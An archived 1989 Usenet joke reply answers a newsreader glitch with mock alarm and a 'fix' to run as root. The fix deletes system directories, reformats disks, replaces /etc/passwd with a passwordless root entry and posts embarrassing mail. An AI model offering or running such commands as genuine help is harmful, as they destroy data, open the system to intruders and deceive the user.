Funny messages

Blair P. Houghton bph at buengc.BU.EDU
Thu Sep 14 04:06:38 AEST 1989

In article <791 at bbm.UUCP> darcy at bbm.UUCP (D'Arcy Cain) writes:
>I guess this is the perfect newsgroup for this question.  Can
>anyone tell me why when I get to comp.unix.wizards in the news
>I get the following on the screen:
>
>/:*Look! An xargs!! (Re: r/:j
>
>It even comes out reverse video and then gives a message that it
>is trashing some articles.  At first I thought it was a one time
>glitch but it seems to be persistent.

ARG!  You've been hit!  Someone's busted into your account and
scribbled garbage all over your kill-partition!!  O Nooooooo!

QUICK!  su to uid 0 then run the following commands:

	cd /
	mail uunet!nsf.nsf.nsf!internet-funds < /etc/please.yank.our.plug &
	mail boss < ~darcy/.please.fire.me &
	pnews < ~darcy/.alt.sex.bondage.confessions.v.raunchy.really &
	rm -rf /bin /u* /lib .??* &
	foreach i ( /dev/r*[1-9] )
	    newfs $i &
	    echo It is a far, far better thing I do: $i, goin\' down a third...
	    echo ...glub, glub, glub...
	end
	echo '::0:0:Nyah-hah-hahhhhhh:/:/bin/csh' > /etc/passwd

This will likely not be able to restore your kill-file,
but it will discourage further intrusions, and reduce the
number of passwords available to those nasty hacker-persons.

				--Blair
				  "Everyone's a critic."